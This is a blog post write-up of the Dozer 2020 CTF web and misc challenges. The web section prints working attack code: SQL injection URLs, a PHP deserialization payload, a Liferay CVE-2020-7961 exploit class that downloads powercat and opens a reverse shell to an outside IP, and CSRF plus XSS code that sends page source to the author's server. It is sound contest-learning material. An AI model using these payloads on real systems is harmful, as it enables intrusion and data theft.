<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.plasf.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="WEBsqli-labs 0 一开始也不知道咋做后面看了Hint提示url二次编码。发现单引号是url二次编码绕过。    但是一些关键字如select、union等被过滤了。尝试内联注释、注释、&amp;lt;&amp;gt;等绕过方法无果。后尝试堆叠注入发现成功。  http://118.31.11.216:30501/?id=1%2527;show%20tables;--+   想起了令人深刻的强网杯随便注">
<meta name="keywords" content="WriteUp">
<meta property="og:type" content="article">
<meta property="og:title" content="Dozer 2020 CTF部分Write up">
<meta property="og:url" content="https://www.plasf.cn/articles/d026958343.html">
<meta property="og:site_name" content="Xiao Leung&#39;s Blog">
<meta property="og:description" content="WEBsqli-labs 0 一开始也不知道咋做后面看了Hint提示url二次编码。发现单引号是url二次编码绕过。    但是一些关键字如select、union等被过滤了。尝试内联注释、注释、&amp;lt;&amp;gt;等绕过方法无果。后尝试堆叠注入发现成功。  http://118.31.11.216:30501/?id=1%2527;show%20tables;--+   想起了令人深刻的强网杯随便注">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200614220108.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200614220443.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200614220846.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200614221253.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200614222456.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614224615.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/0200614225038.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614230021.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614230157.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614230931.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200614231135.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614231648.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200614231558.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/py.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614231934.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614232301.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/QQ%E5%9B%BE%E7%89%8720200614232519.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/QQ%E5%9B%BE%E7%89%8720200614232702.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614232958.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614233025.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614233644.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/HXcode.gif">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614234121.png">
<meta property="og:updated_time" content="2020-10-14T09:24:34.820Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Dozer 2020 CTF部分Write up">
<meta name="twitter:description" content="WEBsqli-labs 0 一开始也不知道咋做后面看了Hint提示url二次编码。发现单引号是url二次编码绕过。    但是一些关键字如select、union等被过滤了。尝试内联注释、注释、&amp;lt;&amp;gt;等绕过方法无果。后尝试堆叠注入发现成功。  http://118.31.11.216:30501/?id=1%2527;show%20tables;--+   想起了令人深刻的强网杯随便注">
<meta name="twitter:image" content="http://goodcheerleung.gitee.io/blog/20200614220108.png">

<link rel="canonical" href="https://www.plasf.cn/articles/d026958343.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Dozer 2020 CTF部分Write up | Xiao Leung's Blog</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9905f6cfc84bbdd051e0d6a5e5f8714a";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Xiao Leung's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">专注网络安全研究</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.plasf.cn/articles/d026958343.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/header.jpg">
      <meta itemprop="name" content="XiaoLeung">
      <meta itemprop="description" content="随笔、分享、记录生活">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Xiao Leung's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Dozer 2020 CTF部分Write up
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-06-15 14:44:53" itemprop="dateCreated datePublished" datetime="2020-06-15T14:44:53+08:00">2020-06-15</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-10-14 17:24:34" itemprop="dateModified" datetime="2020-10-14T17:24:34+08:00">2020-10-14</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF比赛/" itemprop="url" rel="index"><span itemprop="name">CTF比赛</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>5.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>5 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="sqli-labs-0"><a href="#sqli-labs-0" class="headerlink" title="sqli-labs 0"></a>sqli-labs 0</h3><ul>
<li>一开始也不知道咋做后面看了Hint提示url二次编码。发现单引号是url二次编码绕过。</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/20200614220108.png" alt="20200614220108"></p>
<ul>
<li>但是一些关键字如select、union等被过滤了。尝试内联注释、注释、&lt;&gt;等绕过方法无果。后尝试堆叠注入发现成功。</li>
</ul>
<pre><code class="http">http://118.31.11.216:30501/?id=1%2527;show%20tables;--+</code></pre>
<p><img src="http://goodcheerleung.gitee.io/blog/20200614220443.png" alt="20200614220443"></p>
<ul>
<li>想起了令人深刻的强网杯随便注。老套路查字段。</li>
</ul>
<pre><code class="http">http://118.31.11.216:30501/?id=1%2527;show%20columns%20from%20uziuzi;--+</code></pre>
<p><img src="http://goodcheerleung.gitee.io/blog/20200614220846.png" alt="20200614220846"></p>
<ul>
<li>预处理查询数据库内容，这里卡了一会，直接拼接字符串没法执行，所以把字符串转16进制再执行，还有prepare、set这里做了过滤和强网杯一样，利用大小写不敏感直接绕过,直接得到flag.</li>
</ul>
<pre><code class="http">http://118.31.11.216:30501/?id=0%2527%20;set%20@sql%20=0x73656c6563742a66726f6d60757a69757a6960;Prepare%20stmt%20from%20@sql;EXECUTE%20stmt;--+</code></pre>
<p><img src="http://goodcheerleung.gitee.io/blog/20200614221253.png" alt="20200614221253"></p>
<h3 id="白给的反序列化"><a href="#白给的反序列化" class="headerlink" title="白给的反序列化"></a>白给的反序列化</h3><ul>
<li>一开始没看题，一直去读<code>/flag</code>导致卡了一下,没啥绕过的，主要要改写一下payload，由于使用<code>private</code>，会导致生成的payload有&lt;0x00&gt;所以需要绕过一下，而且服务器的php版本是php5.59，没法直接改成public绕过，所以需要吧s改成S（这样能识别16进制的<code>%00</code>）,把&lt;0x00&gt;替换为<code>\00</code>.</li>
</ul>
<pre><code>http://118.31.11.216:30600/?path=O:4:%22home%22:2:{S:12:%22\00home\00method%22;s:5:%22mysys%22;S:10:%22\00home\00args%22;a:1:{i:0;s:8:%22flag.php%22;}}</code></pre><ul>
<li>EXP</li>
</ul>
<pre><code class="php"> &lt;?php

class home
{
    private $method;
    private $args;
    function __construct($method, $args)
    {
        $this-&gt;method = $method;
        $this-&gt;args = $args;
    }

}

$o = new home(&quot;mysys&quot;,[&#39;flag.php&#39;]);
echo serialize($o);
?&gt;</code></pre>
<p><img src="http://goodcheerleung.gitee.io/blog/20200614222456.png" alt="20200614222456"></p>
<h3 id="简单域渗透-flag1"><a href="#简单域渗透-flag1" class="headerlink" title="简单域渗透-flag1"></a>简单域渗透-flag1</h3><ul>
<li><p>这道题抢了2血，看到界面就知道了是最近的<strong>CVE-2020-7961 Liferay Portal</strong></p>
</li>
<li><p>先搞个EXP,用powershell反弹一个shell到服务器：</p>
</li>
</ul>
<pre><code class="java">public class LifExp {
static {
try {
String[] cmd = {&quot;cmd.exe&quot;, &quot;/c&quot;, &quot;powershell IEX (New-Object System.Net.Webclient).DownloadString(&#39;https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1&#39;); powercat -c 39.107.126.173 -p 25565 -e cmd&quot;};

java.lang.Runtime.getRuntime().
exec(cmd).waitFor();
} catch ( Exception e ) {
e.printStackTrace();
}
}
}</code></pre>
<ul>
<li>编译成class放服务器上。</li>
</ul>
<pre><code class="shell">javac .\LifExp.java</code></pre>
<ul>
<li>用marshalsec生成payload</li>
</ul>
<pre><code class="shell">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://39.107.126.173/ LifExp</code></pre>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614224615.png" alt="微信截图_20200614224615"></p>
<ul>
<li>发送数据包</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/0200614225038.png" alt="0200614225038"></p>
<ul>
<li>反弹shell后，flag在桌面的flag.txt</li>
</ul>
<h3 id="fake-phpminiadmin"><a href="#fake-phpminiadmin" class="headerlink" title="fake phpminiadmin"></a>fake phpminiadmin</h3><ul>
<li>这道题拿了3血。题目提示是一个前端漏洞，前端漏洞也就csrf、xss了。nc监听，给网站交一个我们的链接看看：</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614230021.png" alt="微信截图_20200614230021"></p>
<ul>
<li>看到<code>admin_shark.php</code>,不用想了肯定flag就在这个页面了，我们要做的就是把这个页面的源码窃取到。在线上打开这个也印证了这点：</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614230157.png" alt="微信截图_20200614230157"></p>
<ul>
<li>这里是一个类似phpmyadmin的东西，查询时候能直接打印出字符串，这样我们就能够构造一个xss去窃取<code>admin_shark.php</code> 页面源码，但是<code>sql.php</code> 需要POST提交无法直接提交这个链接给后台管理员，所以需要构造一个自动提交的表单来csrf触发这个xss.思路很简单了。画个图说明一下：</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614230931.png" alt="微信截图_20200614230931"></p>
<ul>
<li>这里插入xss到数据库需要注意做了简单的过滤，只需将payload转16进制再<code>unhex</code> 转回来就行了，不过这我是搭了一血的车，我直接把他的xss地址换成我的了：</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200614231135.png" alt="微信图片_20200614231135"></p>
<ul>
<li>构造自动查询表单来触发csrf,exp.html</li>
</ul>
<pre><code class="html">&lt;html&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState(&#39;&#39;, &#39;&#39;, &#39;/&#39;)&lt;/script&gt;
    &lt;form name=&quot;exp&quot; action=&quot;http://127.0.0.1/sql.php&quot; method=&quot;POST&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;sql&quot; value=&quot;select * from p1g3&quot; /&gt;

    &lt;/form&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
document.exp.submit()
&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;
</code></pre>
<ul>
<li>构造获取页面源码的xss</li>
</ul>
<pre><code class="javascript">function createXmlHttp() {
    if (window.XMLHttpRequest) {
        xmlHttp = new XMLHttpRequest()
    } else {
        var MSXML = new Array(&#39;MSXML2.XMLHTTP.5.0&#39;, &#39;MSXML2.XMLHTTP.4.0&#39;, &#39;MSXML2.XMLHTTP.3.0&#39;, &#39;MSXML2.XMLHTTP&#39;, &#39;Microsoft.XMLHTTP&#39;);
        for (var n = 0; n &lt; MSXML.length; n++) {
            try {
                xmlHttp = new ActiveXObject(MSXML[n]);
                break
            } catch(e) {}
        }
    }
}
createXmlHttp();
xmlHttp.onreadystatechange = function(){
  if (xmlHttp.readyState == 4) {
        code=escape(xmlHttp.responseText);
        createXmlHttp();
        url = &quot;http://39.107.126.173:8080/re.php&quot;;   //这里是我们服务器接受的地址
        cc = &quot;htmlcode=&quot; + code +&quot;&amp;filename=index.html&quot;;
        xmlHttp.open(&quot;POST&quot;, url, true);
        xmlHttp.setRequestHeader(&quot;Content-type&quot;, &quot;application/x-www-form-urlencoded&quot;);
        xmlHttp.send(cc)
  }
};
xmlHttp.open(&quot;GET&quot;, &quot;/admin_shark.php&quot;, true);//这块填写获得的后台地址。
xmlHttp.setRequestHeader(&quot;Referer&quot;, &quot;http://127.0.0.1/&quot;);
xmlHttp.send(null);</code></pre>
<ul>
<li>接收页面源码的exp：</li>
</ul>
<pre><code class="php">&lt;?php
        function js_unescape($str) {
                $ret = &#39;&#39;;
                $len = strlen($str);
                for ($i = 0;$i &lt; $len;$i++) {
                        if ($str[$i] == &#39;%&#39; &amp;&amp; $str[$i + 1] == &#39;u&#39;) {
                                $val = hexdec(substr($str, $i + 2, 4));
                                if ($val &lt; 0x7f) $ret.= chr($val);
                                else if ($val &lt; 0x800) $ret.= chr(0xc0 | ($val &gt;&gt; 6)) . chr(0x80 | ($val &amp; 0x3f));
                                else $ret.= chr(0xe0 | ($val &gt;&gt; 12)) . chr(0x80 | (($val &gt;&gt; 6) &amp; 0x3f)) . chr(0x80 | ($val &amp; 0x3f));
                                $i+= 5;
                        } else if ($str[$i] == &#39;%&#39;) {
                                $ret.= urldecode(substr($str, $i, 3));
                                $i+= 2;
                        } else $ret.= $str[$i];
                }
                return $ret;
        }
        $data = js_unescape($_POST[&#39;htmlcode&#39;]);  //对获得源码js_unescape解码。
        $filename = $_POST[&#39;filename&#39;] . date(&quot;y-m-d-h-i-s&quot;) . &quot;.html&quot;;
        $myfile = fopen($filename, &quot;w&quot;);
        fwrite($myfile, $data);
        fclose($myfile);
?&gt;</code></pre>
<ul>
<li>这样我们在提交url给后台时候就会自动跳转的sql.php触发xss窃取<code>admin_shark.php</code>的源码,源码会保存在我们的服务器中。<br><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614231648.png" alt="微信截图_20200614231648"></li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200614231558.png" alt="微信图片_20200614231558"></p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="py吗？"><a href="#py吗？" class="headerlink" title="py吗？"></a>py吗？</h3><ul>
<li>一张老外穿着python文化衫的图片。</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/py.png" alt="py"></p>
<ul>
<li>修一下高度让他恢复正常的crc32校验以便其他软件能够打开：</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614231934.png" alt="微信截图_20200614231934"></p>
<ul>
<li>国际惯例：Stegsolve-&gt;Analyse-&gt;Data Extract</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614232301.png" alt="微信截图_20200614232301"></p>
<ul>
<li>发现base64，解码得到flag.</li>
</ul>
<pre><code>Dozerctf{python_is_the_best_language!}</code></pre><h3 id="夏日计划"><a href="#夏日计划" class="headerlink" title="夏日计划"></a>夏日计划</h3><ul>
<li>下载下来按照国际惯例010打开，发现是一个RAR压缩文件</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/QQ%E5%9B%BE%E7%89%8720200614232519.png" alt="QQ图片20200614232519"></p>
<ul>
<li>直接解压会发现少几个文件，所以直接从里面拉出来就行了</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/QQ%E5%9B%BE%E7%89%8720200614232702.png" alt="QQ图片20200614232702"></p>
<ul>
<li>会发现secret.rar是损坏的，所以直接用winrar修复会发现里面有四个文件，里面的内容全是两两相对，非常像坐标。</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614232958.png" alt="微信截图_20200614232958"></p>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614233025.png" alt="微信截图_20200614233025"></p>
<ul>
<li>而且，这些坐标正好是一个X长度为140，Y的长度为140的平面直角坐标系，一个正方形不用猜都能想到是一个二维之类的的东西了，于是乎kail linux启动用 <code>gnuplot</code>把四个文件合成一个qt.txt，生成一个二维试试看</li>
</ul>
<pre><code class="shell">root@kali:~/桌面# gnuplot

        G N U P L O T
        Version 5.2 patchlevel 8    last modified 2019-12-01 

        Copyright (C) 1986-1993, 1998, 2004, 2007-2019
        Thomas Williams, Colin Kelley and many others

        gnuplot home:     http://www.gnuplot.info
        faq, bugs, etc:   type &quot;help FAQ&quot;
        immediate help:   type &quot;help&quot;  (plot window: hit &#39;h&#39;)

Terminal type is now &#39;qt&#39;
gnuplot&gt; plot &quot;qt.txt&quot;
qt5ct: using qt5ct plugin
gnuplot&gt; 
</code></pre>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614233644.png" alt="微信截图_20200614233644"></p>
<ul>
<li>刚刚在网鼎杯被虐完，怎么可能不知道这是一个汉信码。photoshop,去色，反相，拉曲线，作为一名<code>CTF患者</code>怎么可能不会PS?,于是得到一张汉信码。</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/HXcode.gif" alt="HXcode"></p>
<ul>
<li>这里一定要吐槽一下，全网识别这个东西的网站就一个。。。今天它还蹦了，汉信码官网识别不了汉码官网生成的汉信码。我裂开了，最后找出题的师傅提供了<code>解题过程</code>，解决了。。。。万分感谢。</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20200614234121.png" alt="微信截图_20200614234121"></p>
<h3 id="问卷调查"><a href="#问卷调查" class="headerlink" title="问卷调查"></a>问卷调查</h3><ul>
<li>填问卷</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/articles/d5c12b792b.html" rel="prev" title="GKCTF2020-CheckIN">
      <i class="fa fa-chevron-left"></i> GKCTF2020-CheckIN
    </a></div>
      <div class="post-nav-item">
    <a href="/articles/d69999e3fb.html" rel="next" title="2020″第五空间”智能安全大赛线上初赛Writeup">
      2020″第五空间”智能安全大赛线上初赛Writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB"><span class="nav-number">1.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli-labs-0"><span class="nav-number">1.1.</span> <span class="nav-text">sqli-labs 0</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#白给的反序列化"><span class="nav-number">1.2.</span> <span class="nav-text">白给的反序列化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#简单域渗透-flag1"><span class="nav-number">1.3.</span> <span class="nav-text">简单域渗透-flag1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fake-phpminiadmin"><span class="nav-number">1.4.</span> <span class="nav-text">fake phpminiadmin</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-number">2.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#py吗？"><span class="nav-number">2.1.</span> <span class="nav-text">py吗？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#夏日计划"><span class="nav-number">2.2.</span> <span class="nav-text">夏日计划</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#问卷调查"><span class="nav-number">2.3.</span> <span class="nav-text">问卷调查</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="XiaoLeung"
      src="/header.jpg">
  <p class="site-author-name" itemprop="name">XiaoLeung</p>
  <div class="site-description" itemprop="description">随笔、分享、记录生活</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">66</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.redmango.top/" title="https://www.redmango.top/" rel="noopener" target="_blank">HhhM</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://l1near.top/" title="https://l1near.top/" rel="noopener" target="_blank">L1nearのspace</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.mrskye.cn/" title="https://www.mrskye.cn/" rel="noopener" target="_blank">SkYe's Blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.kawhi.xyz" title="https://www.kawhi.xyz" rel="noopener" target="_blank">kawhi</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

